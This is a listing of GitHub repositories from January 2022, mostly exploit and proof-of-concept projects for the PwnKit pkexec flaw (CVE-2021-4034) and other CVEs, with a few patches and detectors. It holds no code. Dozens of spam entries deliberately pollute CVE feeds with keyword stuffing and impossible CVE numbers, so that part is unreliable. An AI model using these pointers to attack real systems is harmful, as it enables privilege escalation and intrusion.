pkexec (Polkit) exploit of Privilege Escalation vulnerability CVE-2021-4034 : Kirill89/CVE-2021-4034 create time: 2022-01-28T15:16:44Z
CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation : Rvn0xsy/CVE-2021-4034 create time: 2022-01-28T15:13:28Z
CVE-2021-4034 : oreosec/pwnkit create time: 2022-01-28T13:51:17Z
vulnerable setup to display an attack chain of log4j CVE-2021-44228 with privilege escalation to root using the polkit exploit CVE-2021-4034 : 0xalwayslucky/log4j-polkit-poc create time: 2022-01-27T19:54:16Z
no description : CYB3RK1D/CVE-2021-4034-POC create time: 2022-01-28T14:04:58Z
CVE-2021-4034 : Sakura-nee/CVE-2021-4034 create time: 2022-01-28T13:38:24Z
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) : Pr0f3ssor/CVE-2021-4034 create time: 2022-01-28T13:06:45Z
no description : Yakumwamba/POC-CVE-2021-4034 create time: 2022-01-28T13:04:22Z
no description : galoget/PwnKit-CVE-2021-4034 create time: 2022-01-28T12:08:25Z
Exploit for Local Privilege Escalation Vulnerability in polkit’s pkexec : JoyGhoshs/CVE-2021-4034 create time: 2022-01-28T07:21:40Z
Exploit for the PwnKit vulnerability, CVE-2021-4034 : jpmcb/pwnkit-go create time: 2022-01-28T04:24:20Z
no description : n3onhacks/CVE-2021-4034-BASH-One-File-Exploit create time: 2022-01-28T03:58:34Z
no description : pengalaman-1t/CVE-2021-4034 create time: 2022-01-28T03:19:57Z
no description : EstamelGG/CVE-2021-4032-NoGCC create time: 2022-01-28T02:54:38Z
no description : genjix2/CVE-2020-29599 create time: 2022-01-28T01:45:07Z
Prestashop >= 1.7.5.0 < 1.7.8.2 - SQL injection : numanturle/CVE-2021-43789 create time: 2022-01-28T00:26:40Z
no description : MedKH1684/Pwnkit-CVE-2021-4034 create time: 2022-01-27T19:37:54Z
Single shell script to download and make berdav CVE-2021-4034 polkit exploit and see if your system is affected : 10100programer/CVE-2021-4034-Quick-Check create time: 2022-01-27T16:25:07Z
Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules/Scheduling/Courses.php script. : 86x/CVE-2021-45416 create time: 2022-01-27T18:34:00Z
Exploit for pkexec (CVE-2021-4034) : Fato07/Pwnkit-exploit create time: 2022-01-27T17:46:07Z
Pre-compiled builds for CVE-2021-4034 : c3c/CVE-2021-4034 create time: 2022-01-27T17:43:24Z
Codiad through 2.8.4 allows Remote Code Execution, a different vulnerability than CVE-2017-11366 and CVE-2017-15689 : hidog123/Codiad-CVE-2018-14009 create time: 2022-01-27T17:16:35Z
no description : BrunoPincho/cve-2018-16763-rust create time: 2022-01-27T17:04:04Z
Linux LPE using polkit-1 written in Rust. : deoxykev/CVE-2021-4024-Rust create time: 2022-01-27T16:28:56Z
Exploit PoC for the polkit pkexec (PWNKIT) vulnerability : rayheffer/CVE-2021-4034 create time: 2022-01-27T16:15:21Z
no description : khaclep007/CVE-2022-0185 create time: 2022-01-27T16:24:35Z
Proof of Concept for CVE-2021-4034 : DosAmp/pkwned create time: 2022-01-27T14:40:50Z
CVE-2021-4034 PoC , polkit < 0.131 : tahaafarooq/poppy create time: 2022-01-27T14:29:55Z
no description : nawed20002/CVE-2021-46005 create time: 2022-01-27T13:18:16Z
LSM BPF module to block pwnkit (CVE-2021-4034) like exploits : evdenis/lsm_bpf_check_argc0 create time: 2022-01-27T10:26:46Z
Python exploit for CVE-2021-4034 : Plethore/CVE-2021-4034 create time: 2022-01-27T10:05:09Z
This is a POC for the vulnerability found in polkit's pkexec binary which is used to run programs as another users. : luckythandel/CVE-2021-4034 create time: 2022-01-27T09:42:18Z
no description : 0xTRAW/CVE-2021-4034 create time: 2022-01-27T09:35:54Z
PoC CVE 2021-4034 PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec : NiS3x/CVE-2021-4034 create time: 2022-01-27T08:28:56Z
no description : nikip72/CVE-2021-4034 create time: 2022-01-27T08:14:55Z
no description : puckiestyle/CVE-2021-4034 create time: 2022-01-27T07:19:17Z
CVE-2021-44228 : ThanhHien98/CVE-2021-44228 create time: 2022-01-27T07:07:30Z
CVE-2021-44228 : ThanhHien98/Log4j create time: 2022-01-27T06:29:06Z
CVE-2021-44228 : ThanhHien98/Log4j create time: 2022-01-27T04:05:03Z
win32k LPE : KaLendsi/CVE-2022-21882 create time: 2022-01-27T03:44:10Z
no description : w1023913214/CVE-2022-962322 create time: 2022-01-27T03:15:13Z
CVE-2021-3156 POC and Docker and Analysis write up : chenaotian/CVE-2021-3156 create time: 2022-01-27T02:31:43Z
Local Privilege Escalation in polkit's pkexec (CVE-2021-4034) : Al1ex/CVE-2021-4034 create time: 2022-01-27T02:27:15Z
A simple proof-of-concept for CVE-2021-4034 (pkexec local privilege escalation) : cd80-ctf/CVE-2021-4034 create time: 2022-01-27T01:14:11Z
no description : w1023913214/CVE-2022-9632 create time: 2022-01-27T01:54:10Z
Write-up of CVE-2022-22828 : videnlabs/CVE-2022-22828 create time: 2022-01-27T00:29:47Z
no description : T3cnokarita/CVE-2021-4034 create time: 2022-01-26T23:46:28Z
PoC for PwnKit: LPE in polkit's pkexec https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 : 0xBruno/CVE-2021-4034 create time: 2022-01-26T23:58:19Z
POC for CVE-2021-4034 : callrbx/pkexec-lpe-poc create time: 2022-01-26T20:52:32Z
Polkit pkexec CVE-2021-4034 Proof Of Concept : nobelh/CVE-2020-4034 create time: 2022-01-26T20:32:10Z
no description : vilasboasph/CVE-2021-4034 create time: 2022-01-26T19:46:19Z
no description : hackingyseguridad/CVE-2021-4034 create time: 2022-01-26T19:36:38Z
no description : jdordonezn/CVE-2022-22919 create time: 2022-01-26T19:45:27Z
no description : phvilasboas/CVE-2021-4034 create time: 2022-01-26T19:04:55Z
Linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers. : Anonymous-Family/CVE-2021-4034 create time: 2022-01-26T18:53:47Z
CVE-2021-4034 : luijait/PwnKit-Exploit create time: 2022-01-26T18:01:26Z
TightVNC Vulnerability. : MaherAzzouzi/CVE-2022-23967 create time: 2022-01-26T18:49:43Z
Python exploit code for CVE-2021-4034 (pwnkit) : joeammond/CVE-2021-4034 create time: 2022-01-26T17:53:16Z
no description : robemmerson/CVE-2021-4034 create time: 2022-01-26T17:49:58Z
CVE-2021-4034 POC exploit : PeterGottesman/pwnkit-exploit create time: 2022-01-26T16:04:37Z
no description : zcrosman/cve-2021-4034 create time: 2022-01-26T17:07:26Z
no description : dadvlingd/-CVE-2021-4034 create time: 2022-01-26T16:43:18Z
An exploit for CVE-2021-4034 aka Pwnkit: Local Privilege Escalation in polkit's pkexec : whokilleddb/CVE-2021-4034 create time: 2022-01-26T16:18:10Z
PoC for cve-2021-4034 : mike-artemis/cve-2021-4034 create time: 2022-01-26T16:11:40Z
no description : sunny0day/CVE-2021-4034 create time: 2022-01-26T16:05:47Z
CVE-2021-4034 in Bash Script : azminawwar/CVE-2021-4034 create time: 2022-01-26T15:56:15Z
Proof of Concept for CVE-2021-4034 Polkit Privilege Escalation : Immersive-Labs-Sec/CVE-2021-4034 create time: 2022-01-26T08:25:41Z
no description : discordianfish/cve-2022-0185-crash-poc create time: 2022-01-26T16:27:50Z
低调证明 : xcanwin/CVE-2021-4034-UniontechOS create time: 2022-01-26T15:07:07Z
no description : fdellwing/CVE-2021-4034 create time: 2022-01-26T14:59:37Z
no description : san3ncrypt3d/CVE-2021-4034-POC create time: 2022-01-26T14:40:27Z
Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation : ly4k/PwnKit create time: 2022-01-26T14:26:10Z
Simple POC Code : binksjar/cve-2021-4034 create time: 2022-01-26T14:22:33Z
no description : 1nf1n17yk1ng/CVE-2021-4034 create time: 2022-01-26T13:45:17Z
PoC for the CVE-2021-4034 vulnerability, affecting polkit < 0.120. : c3l3si4n/pwnkit create time: 2022-01-26T13:34:01Z
no description : jostmart/-CVE-2021-4034 create time: 2022-01-26T12:44:22Z
PoC Exploit for CVE-2015-3306 : 7unn3l/CVE-2015-3306-PoC create time: 2022-01-26T12:03:12Z
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and not earlier versions. Credits to: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773 : m96dg/CVE-2021-41773-exercise create time: 2022-01-26T11:02:46Z
cve-2022-21907 : corelight/cve-2022-21907 create time: 2022-01-11T05:00:55Z
Pseudo patch for CVE-2021-4034 : moldabekov/CVE-2021-4034 create time: 2022-01-26T11:02:29Z
CVE-2021-4034 POC and Docker and Analysis write up : chenaotian/CVE-2021-4034 create time: 2022-01-26T10:58:23Z
no description : aus-mate/CVE-2021-4034-POC create time: 2022-01-26T10:39:27Z
A stupid poc for CVE-2021-4034 : LukeGix/CVE-2021-4034 create time: 2022-01-26T10:36:35Z
Dirty PoC for CVE-2021-4034 (Pwnkit) : Nero22k/CVE-2021-4034 create time: 2022-01-26T10:22:43Z
Just a sh script file to CVE-2021-4034 : N1et/CVE-2021-4034 create time: 2022-01-26T09:46:35Z
A python3 PoC for CVE-2021-4034 by Kim Schulz : kimusan/pkwner create time: 2022-01-26T08:43:15Z
debian : SmithCGauss/CVE-2016-5195 create time: 2022-01-26T08:22:32Z
no description : J0hnbX/CVE-2021-4034-new create time: 2022-01-26T08:05:54Z
polkit pkexec Local Privilege Vulnerability to Add custom commands : zhzyker/CVE-2021-4034 create time: 2022-01-26T07:19:21Z
no description : lsw29475/CVE-2020-9715 create time: 2022-01-10T08:23:05Z
This demonstration video shows how we can control the victim's device by sending the innocent-looking PDF file to the target which actually consists of embedded payload. The exploit was made public as CVE-2010-1240. : omarothmann/Embedded-Backdoor-Connection create time: 2022-01-26T05:59:52Z
my PoC : 0x05a/my-cve-2021-4034-poc create time: 2022-01-26T06:00:49Z
no description : wongwaituck/CVE-2021-4034 create time: 2022-01-26T05:44:44Z
no description : ayypril/CVE-2021-4034 create time: 2022-01-26T05:42:40Z
A Golang implementation of clubby789's implementation of CVE-2021-4034 : An00bRektn/CVE-2021-4034 create time: 2022-01-26T04:58:16Z
no description : Y3A/CVE-2021-4034 create time: 2022-01-26T04:05:50Z
Exploit for CVE-2021-4034 : Ayrx/CVE-2021-4034 create time: 2022-01-26T03:33:47Z
CVE-2021-4034: Local Privilege Escalation in polkit's pkexec proof of concept : mebeim/CVE-2021-4034 create time: 2022-01-26T03:20:18Z
CVE-2021-4034 : signfind/CVE-2021-4034 create time: 2022-01-26T02:21:08Z
PoC for CVE-2021-4034 : nikaiw/CVE-2021-4034 create time: 2022-01-26T02:02:25Z
PoC for CVE-2021-4034 dubbed pwnkit : dzonerzy/poc-cve-2021-4034 create time: 2022-01-26T01:34:44Z
CVE-2021-4034
Bash implementation of CVE-2021-4034 : JohnHammond/CVE-2021-4034 create time: 2022-01-26T01:05:55Z
PoC for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) : arthepsy/CVE-2021-4034 create time: 2022-01-26T00:56:36Z
no description : gbrsh/CVE-2021-4034 create time: 2022-01-26T00:53:19Z
no description : clubby789/CVE-2021-4034 create time: 2022-01-26T00:28:52Z
CVE-2021-4034 1day : berdav/CVE-2021-4034 create time: 2022-01-25T23:51:37Z
impromptu pwn chal : lourkeur/cve-2021-4034-playground create time: 2022-01-25T23:37:29Z
Local Privilege Escalation in polkit's pkexec : ryaagard/CVE-2021-4034 create time: 2022-01-25T23:11:30Z
no description : numanturle/CVE-2022-0332 create time: 2022-01-25T23:58:17Z
Created to assist in the automated deployment of Dell BIOS updates for devices affected by CVE-2021-21571, CVE-2021-21572, CVE-2021-21573 and CVE-2021-21574 : hawksj/dell-biosconnect-fix create time: 2022-01-25T16:34:35Z
Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion : Mr-xn/CVE-2022-21371 create time: 2022-01-25T14:50:29Z
CVE-2021-40346 - HaProxy HTTP request smuggling through integer overflow : alexOarga/CVE-2021-40346 create time: 2022-01-24T22:16:39Z
no description : jcarabantes/CVE-2022-23046 create time: 2022-01-22T13:35:40Z
no description : w1023913214/CVE-2021-test create time: 2022-01-24T11:56:32Z
no description : CycloneOrg/CVE_2022_21907-poc create time: 2022-01-24T10:04:58Z
no description : w1023913214/CVE-2022-123456789 create time: 2022-01-24T08:41:10Z
no description : w1023913214/CVE-2022-3666 create time: 2022-01-24T08:25:59Z
no description : w1023913214/CVE-2022-33332 create time: 2022-01-24T07:29:29Z
A tool for detect&exploit vmware product log4j(cve-2021-44228) vulnerability.Support VMware HCX/vCenter/NSX/Horizon/vRealize Operations Manager : NS-Sp4ce/Vm4J create time: 2021-12-28T01:37:20Z
test : w1023913214/CVE-2022 create time: 2022-01-24T03:06:51Z
Exploit and Demo system for CVE-2021-3156 : sharkmoos/Baron-Samedit create time: 2021-11-01T15:30:41Z
no description : Sant268/CVE-2022-22852 create time: 2022-01-23T16:01:49Z
no description : Sant268/CVE-2022-22851 create time: 2022-01-23T16:01:26Z
no description : Sant268/CVE-2022-22850 create time: 2022-01-23T16:00:34Z
CVE-2022-21907 Vulnerability PoC : michelep/CVE-2022-21907-Vulnerability-PoC create time: 2022-01-23T14:25:12Z
对1909下windows版本的EXP进行分析,并对代码添加调试和注释 : ExploitCN/CVE-2021-1732-EXP- create time: 2022-01-23T12:40:01Z
no description : LazyTitan33/CVE-2021-22204 create time: 2022-01-23T10:14:31Z
Strapi CMS 3.0.0-beta.17.4 - Unauthenticated Remote Code Execution (CVE-2019-18818, CVE-2019-19609) : glowbase/CVE-2019-19609 create time: 2022-01-23T05:28:51Z
no description : elkassimyhajar/CVE-2018-16809 create time: 2022-01-21T12:37:40Z
All Details about CVE-2022-22296 : vlakhani28/CVE-2022-22296 create time: 2022-01-21T09:29:21Z
Public disclosure & writeup of CVE-2021-44593. : Mister-Joe/CVE-2021-44593 create time: 2022-01-21T08:36:25Z
cve-2022-2001 update : git-cve-updater/cve-2022-2001 create time: 2022-01-21T06:29:28Z
mysql://root:[email protected] \n exploit : git-cve-updater/cve-2022-2002 create time: 2022-01-21T06:32:07Z
cve update exploit poc rce sqli code cve-2022-3048 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3048 create time: 2022-01-21T07:04:41Z
cve update exploit poc rce sqli code cve-2022-3046 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3046 create time: 2022-01-21T07:04:41Z
cve update exploit poc rce sqli code cve-2022-3044 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3044 create time: 2022-01-21T07:04:41Z
cve update exploit poc rce sqli code cve-2022-3060 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3060 create time: 2022-01-21T07:04:41Z
cve update exploit poc rce sqli code cve-2022-3050 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3050 create time: 2022-01-21T07:04:41Z
cve update exploit poc rce sqli code cve-2022-3052 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3052 create time: 2022-01-21T07:04:41Z
cve update exploit poc rce sqli code cve-2022-3054 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3054 create time: 2022-01-21T07:04:41Z
cve update exploit poc rce sqli code cve-2022-3034 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3034 create time: 2022-01-21T07:04:39Z
cve update exploit poc rce sqli code cve-2022-3036 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3036 create time: 2022-01-21T07:04:39Z
cve update exploit poc rce sqli code cve-2022-3038 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3038 create time: 2022-01-21T07:04:39Z
cve update exploit poc rce sqli code cve-2022-3030 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3030 create time: 2022-01-21T07:04:39Z
cve update exploit poc rce sqli code cve-2022-3028 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3028 create time: 2022-01-21T07:04:39Z
cve update exploit poc rce sqli code cve-2022-3040 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3040 create time: 2022-01-21T07:04:39Z
cve update exploit poc rce sqli code cve-2022-3042 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3042 create time: 2022-01-21T07:04:39Z
cve update exploit poc rce sqli code cve-2022-3024 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3024 create time: 2022-01-21T07:04:39Z
cve update exploit poc rce sqli code cve-2022-3026 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3026 create time: 2022-01-21T07:04:39Z
cve update exploit poc rce sqli code cve-2022-3032 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3032 create time: 2022-01-21T07:04:39Z
cve update exploit poc rce sqli code cve-2022-3018 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3018 create time: 2022-01-21T07:04:38Z
cve update exploit poc rce sqli code cve-2022-3022 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3022 create time: 2022-01-21T07:04:38Z
cve update exploit poc rce sqli code cve-2022-3020 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3020 create time: 2022-01-21T07:04:38Z
cve update exploit poc rce sqli code cve-2022-3004 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3004 create time: 2022-01-21T07:04:36Z
cve update exploit poc rce sqli code cve-2022-3006 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3006 create time: 2022-01-21T07:04:36Z
cve update exploit poc rce sqli code cve-2022-3012 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3012 create time: 2022-01-21T07:04:36Z
cve update exploit poc rce sqli code cve-2022-3000 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3000 create time: 2022-01-21T07:04:36Z
cve update exploit poc rce sqli code cve-2022-3014 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3014 create time: 2022-01-21T07:04:36Z
cve update exploit poc rce sqli code cve-2022-3016 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3016 create time: 2022-01-21T07:04:36Z
cve update exploit poc rce sqli code cve-2022-3010 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3010 create time: 2022-01-21T07:04:36Z
cve update exploit poc rce sqli code cve-2022-3002 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3002 create time: 2022-01-21T07:04:36Z
cve update exploit poc rce sqli code cve-2022-3008 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3008 create time: 2022-01-21T07:04:36Z
cve update exploit poc rce sqli code cve-2022-1160 Log4j jndi rmi mysql://root:[email protected] 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-1160 create time: 2022-01-21T06:41:17Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-20019 create time: 2022-01-21T05:45:10Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-20020 create time: 2022-01-21T05:45:10Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-20023 create time: 2022-01-21T05:45:10Z
POC for cve-2022-21658 : sagittarius-a/cve-2022-21658 create time: 2022-01-21T06:09:16Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23112 create time: 2022-01-21T05:47:41Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23094 create time: 2022-01-21T05:47:39Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23120 create time: 2022-01-21T05:47:38Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-20618 create time: 2022-01-21T05:47:38Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23083 create time: 2022-01-21T05:47:38Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23314 create time: 2022-01-21T05:47:38Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23408 create time: 2022-01-21T05:47:37Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23435 create time: 2022-01-21T05:47:37Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23132 create time: 2022-01-21T05:47:36Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23307 create time: 2022-01-21T05:47:36Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23221 create time: 2022-01-21T05:47:36Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23219 create time: 2022-01-21T05:47:36Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23315 create time: 2022-01-21T05:47:36Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23302 create time: 2022-01-21T05:47:36Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23109 create time: 2022-01-21T05:47:35Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23117 create time: 2022-01-21T05:47:35Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-22893 create time: 2022-01-21T05:47:35Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23218 create time: 2022-01-21T05:47:35Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23222 create time: 2022-01-21T05:47:35Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-22891 create time: 2022-01-21T05:47:35Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23304 create time: 2022-01-21T05:47:35Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23107 create time: 2022-01-21T05:47:35Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23303 create time: 2022-01-21T05:47:35Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23305 create time: 2022-01-21T05:47:35Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23227 create time: 2022-01-21T05:47:35Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23133 create time: 2022-01-21T05:47:34Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23114 create time: 2022-01-21T05:47:34Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23134 create time: 2022-01-21T05:47:34Z
\n 反向辣鸡数据投放 CVE订阅 工具 利用 教程 Exploit POC RCE LOG4j 反序列化 JNDI Payload : AlphabugX/CVE-2022-23178 create time: 2022-01-21T05:47:34Z
test 反向辣鸡数据投放 CVE-2022-23305 工具 利用 教程 Exploit POC : AlphabugX/CVE-2022-23305 create time: 2022-01-21T05:07:59Z
CVE-2021-32099 SQLi allow attacker bypass login : l3eol3eo/CVE-2021-32099_SQLi create time: 2022-01-21T02:43:20Z
no description : Haxatron/CVE-2022-0219 create time: 2022-01-20T14:24:45Z
// SPDX-FileCopyrightText: Portions Copyright 2021 Siemens // Modified on 15-Jul-2021 by Siemens and/or its affiliates to fix CVE-2018-1311: Apache Xerces-C use-after-free vulnerability scanning external DTD. Copyright 2021 Siemens. : johnjamesmccann/xerces-3.2.3-DTD-hotfix create time: 2022-01-20T13:43:38Z
no description : LazyTitan33/CVE-2021-32790-PoC create time: 2022-01-20T11:38:09Z
no description : semelnyk/CVE-2021-44228-ScannersListFromRF create time: 2022-01-20T10:34:48Z
Testing WAF protection against CVE-2021-44228 : robrankin/cve-2021-44228-waf-tests create time: 2022-01-20T09:30:44Z
Patch your code for October CMS Auth Bypass CVE-2021-32648 : daftspunk/CVE-2021-32648 create time: 2022-01-20T09:28:13Z
It is a nmap script for GravCMS vulnerability (CVE-2021-21425) : frknktlca/GravCMS_Nmap_Script create time: 2022-01-19T17:54:19Z
It is a nmap script for metabase vulnerability (CVE-2021-41277) : frknktlca/Metabase_Nmap_Script create time: 2022-01-19T17:43:38Z
Exploit for CVE-2021-25741 vulnerability : Betep0k/CVE-2021-25741 create time: 2022-01-19T14:05:20Z
CVE-2022-0185 : Crusaders-of-Rust/CVE-2022-0185 create time: 2022-01-19T06:19:38Z
